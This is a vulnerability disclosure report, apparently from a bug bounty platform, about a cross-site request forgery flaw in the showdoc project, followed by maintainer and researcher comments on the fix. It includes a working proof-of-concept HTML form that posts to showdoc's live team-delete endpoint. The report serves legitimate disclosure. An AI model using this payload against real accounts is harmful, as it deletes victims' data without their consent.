Cross-Site Request Forgery (CSRF) in star7th/showdoc

Valid

Reported on

Nov 21st 2021


Description

You set the strict flag only for one of your cookies named cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID don't have strict flag.

Proof of Concept

1.replace 38046 with the team id

2.open poc.html and click on submit button.

3.after that the team with id 38046 or your replaced team id will be deleted.

//poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
We are processing your report and will contact the star7th/showdoc team within 24 hours. 7 days ago
star7th validated this vulnerability 6 days ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on 654e87 6 days ago
star7th has been awarded the fix bounty
ItemModel.class.php#L1-L40 has been validated
star7th
6 days ago

Maintainer


I should fix it. You can test it

amammad
6 days ago

Researcher


Hey chen

Not fixed and just like before( I logout from the system and login again)

this is a fix commit that have a good fix for strict cookies :

https://github.com/devcode-it/openstamanager/blob/402dca9162a84cf7617a8bbd582aa9ad51259016/core.php#L58

Jamie Slome
5 days ago

Admin


@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.

star7th
4 days ago

Maintainer


@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.